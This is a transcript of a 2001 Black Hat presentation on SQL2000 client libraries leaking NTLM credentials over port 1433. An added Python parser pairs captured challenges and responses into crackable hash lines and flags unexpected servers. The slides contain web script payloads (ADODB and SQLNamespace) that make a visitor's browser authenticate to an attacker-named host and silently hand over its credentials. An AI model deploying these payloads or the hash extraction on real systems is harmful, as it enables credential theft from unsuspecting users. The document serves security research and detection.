This presentation by Timothy Mullen at Blackhat Vegas 2001 delves into the vulnerabilities of SQL2000, particularly emphasizing the exploitation of LM/NTLM challenge-response pairs over TCP/IP sockets. It discusses the shift from named pipes to TCP/IP for integrated authentication and identifies the risks posed by improperly configured routers that allow traffic through port 1433. Various examples illustrate how SQL namespaces and ADODB can be exploited for credential theft, underscoring the urgency for better security practices in database authentication.
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel…
Timothy M. Mullen, AnchorIS.Com, Inc. (thor@hammerofgod.com)
Timothy Mullen, AnchorIS.Com, Blackhat Vegas 2001
The Culprit: SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP Sockets, encryption, authentication, etc.
• Default library on workstations that have SQL2k client utilities installed. (MSDE as well?)
Backgrounders…
• SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts)
• Integrated Authentication (NTLM creds) needed Named Pipes
• Named Pipes required 139/445 open to the authenticating system.
Backgrounders… cont.
• Integrated Authentication has _always_ been the recommended configuration.
• 139/445 has long been blocked at the router (if not, you are a yum-yum.)
• Many server-to-server apps authenticate over TCP 1433 because it is “safe”.
The Skinny
• DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs can now be sent out via 1433 (or other ports, if the default was changed).
The Problem
• Many routers, though specifically blocking 139/445, still allow established traffic out, i.e. 1433 outbound is free to pass.
• Many have 1433 explicitly open for application support, server-to-server queries, etc.
The Sting
• Client-side ODBC connections can specify the target server, authentication type, and the library to use.
• Web sites can request that the client perform ADODB recordset requests, as well as other tasks.
• HTML email as well.
Somewhat Lame Example
• Web site with the following script block:
  {
    // Integrated Security=SSPI forces the client's own NTLM creds to be used,
    // Network Library=dbnetlib forces the super sockets lib, so the exchange
    // goes out over TCP 1433 to whatever host Data Source names.
    conn = new ActiveXObject("ADODB.Connection");
    conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
    conn.Open();
  }
Example Cont…
• User is presented with the “This page is accessing a data source from another domain. Do you want to allow this?” dialog box.
• Easily engineered around…
Not So Lame Example
• Let's try this one:
  {
    // SQLNS.SQLNamespace is marked safe for scripting, so no cross-domain prompt.
    // Trusted_Connection=Yes is the integrated-auth switch; 2 is the
    // SQLNSRootType_Server root type.
    ns = new ActiveXObject("SQLNS.SQLNamespace");
    ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
  }
What’s the difference?
• SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_!
• Silently grab the creds for fun and profit!
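What actually leaves the workstation when either script runs is an ordinary NTLMSSP exchange wrapped in TDS packets on port 1433: the attacker's "server" sends a CHALLENGE, the client answers with an AUTHENTICATE carrying the LM and NT responses. The following is an added example, not code from the deck or from Mullen: it decodes those two NTLM messages out of raw TCP payloads (TDS framing is skipped by searching for the `NTLMSSP\0` signature), pairs challenge and responses per client/server flow, emits the NETNTLMv1 line a cracker would consume, and flags any integrated-auth exchange to a SQL host not on an allowlist. The sample packets, hosts (`10.1.1.1`, `10.1.1.50`), user and hashes are all constructed; the NTLM field offsets are the public NTLMSSP layout.

```python
"""Spot and reassemble LM/NTLM challenge/response pairs riding on TCP 1433."""
import struct
from typing import Optional

NTLMSSP = b"NTLMSSP\x00"
SQL_PORT = 1433


def _field(blob: bytes, off: int) -> bytes:
    """Resolve an NTLM (len, maxlen, offset) field header to the bytes it points at."""
    ln, _maxlen, start = struct.unpack_from("<HHI", blob, off)
    return blob[start:start + ln]


def parse_ntlm(blob: bytes) -> Optional[dict]:
    """Decode one NTLMSSP message; blob must start at the signature."""
    if not blob.startswith(NTLMSSP) or len(blob) < 12:
        return None
    mtype = struct.unpack_from("<I", blob, 8)[0]
    if mtype == 1:
        return {"type": 1}
    if mtype == 2 and len(blob) >= 32:          # CHALLENGE: ServerChallenge at offset 24
        return {"type": 2, "challenge": blob[24:32]}
    if mtype == 3 and len(blob) >= 64:          # AUTHENTICATE: responses, domain, user
        flags = struct.unpack_from("<I", blob, 60)[0]
        codec = "utf-16-le" if flags & 0x1 else "latin-1"   # NTLMSSP_NEGOTIATE_UNICODE
        return {
            "type": 3,
            "lm_response": _field(blob, 12),
            "nt_response": _field(blob, 20),
            "domain": _field(blob, 28).decode(codec),
            "user": _field(blob, 36).decode(codec),
        }
    return None


def find_ntlm(payload: bytes):
    """Yield every NTLMSSP message embedded in a TCP payload, ignoring TDS framing."""
    i = payload.find(NTLMSSP)
    while i != -1:
        msg = parse_ntlm(payload[i:])
        if msg:
            yield msg
        i = payload.find(NTLMSSP, i + 1)


class SqlNtlmGrabber:
    """Pair a server CHALLENGE with the client's AUTHENTICATE on 1433 flows."""

    def __init__(self, allowed_servers):
        self.allowed = set(allowed_servers)   # SQL hosts integrated auth may legitimately reach
        self.pending = {}                     # (client, server) -> 8-byte challenge
        self.alerts = []

    def feed(self, src, sport, dst, dport, payload):
        if SQL_PORT not in (sport, dport):
            return
        server, client = (src, dst) if sport == SQL_PORT else (dst, src)
        key = (client, server)
        for msg in find_ntlm(payload):
            if msg["type"] == 2:
                self.pending[key] = msg["challenge"]
            elif msg["type"] == 3 and key in self.pending:
                chal = self.pending.pop(key)
                self.alerts.append({
                    "client": client, "server": server,
                    "user": msg["user"], "domain": msg["domain"],
                    # hashcat 5500 / JtR netntlm line: user::domain:LM:NT:challenge
                    "netntlmv1": "%s::%s:%s:%s:%s" % (msg["user"], msg["domain"],
                                                      msg["lm_response"].hex(),
                                                      msg["nt_response"].hex(), chal.hex()),
                    "unexpected_server": server not in self.allowed,
                })


# --- constructed sample traffic -------------------------------------------
def tds_packet(ptype: int, body: bytes) -> bytes:
    """TDS header: type, status EOM, big-endian length incl. header, spid, packet id, window."""
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(body), 0, 1, 0) + body


def build_challenge(challenge: bytes) -> bytes:
    flags = 0x00008201   # UNICODE | NTLM | ALWAYS_SIGN (constructed value)
    return (NTLMSSP + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", flags) + challenge + bytes(8)
            + struct.pack("<HHI", 0, 0, 48) + bytes(8))


def build_authenticate(user: str, domain: str, lm: bytes, nt: bytes) -> bytes:
    flags, hdr_len, fields, data = 0x00008201, 64, [], b""
    for chunk in (lm, nt, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""):
        fields.append(struct.pack("<HHI", len(chunk), len(chunk), hdr_len + len(data)))
        data += chunk
    return NTLMSSP + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", flags) + data


def demo():
    """Workstation 10.1.1.50 is lured into integrated auth against 10.1.1.1 (constructed)."""
    g = SqlNtlmGrabber(allowed_servers={"10.0.0.5"})
    chal, lm, nt = bytes.fromhex("0123456789abcdef"), bytes(range(24)), bytes(range(24, 48))
    c = build_challenge(chal)
    g.feed("10.1.1.1", 1433, "10.1.1.50", 3120,
           tds_packet(0x04, b"\xed" + struct.pack("<H", len(c)) + c))   # SSPI token in a response
    g.feed("10.1.1.50", 3120, "10.1.1.1", 1433,
           tds_packet(0x11, build_authenticate("jdoe", "CORP", lm, nt)))  # SSPI message packet
    return g.alerts


if __name__ == "__main__":
    for a in demo():
        print(a)
```

Run `demo()` and the single alert shows the 1433 flow to 10.1.1.1, marked `unexpected_server`, with the NETNTLMv1 line ready for offline cracking: that line is exactly what the deck means by "grabbing the creds", and the allowlist check is the cheap detection a network sensor can do today. The same signature scan works on any port, which matters because the deck notes the library can be pointed at a non-default port.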
Live Demo
• Don’t try this at home! Professional driver on closed course.
Thanks!
AnchorIS.Com: www.anchoris.com
HammerofGod: www.hammerofgod.com
Timothy M. Mullen: tmullen@anchoris.com, thor@hammerofgod.com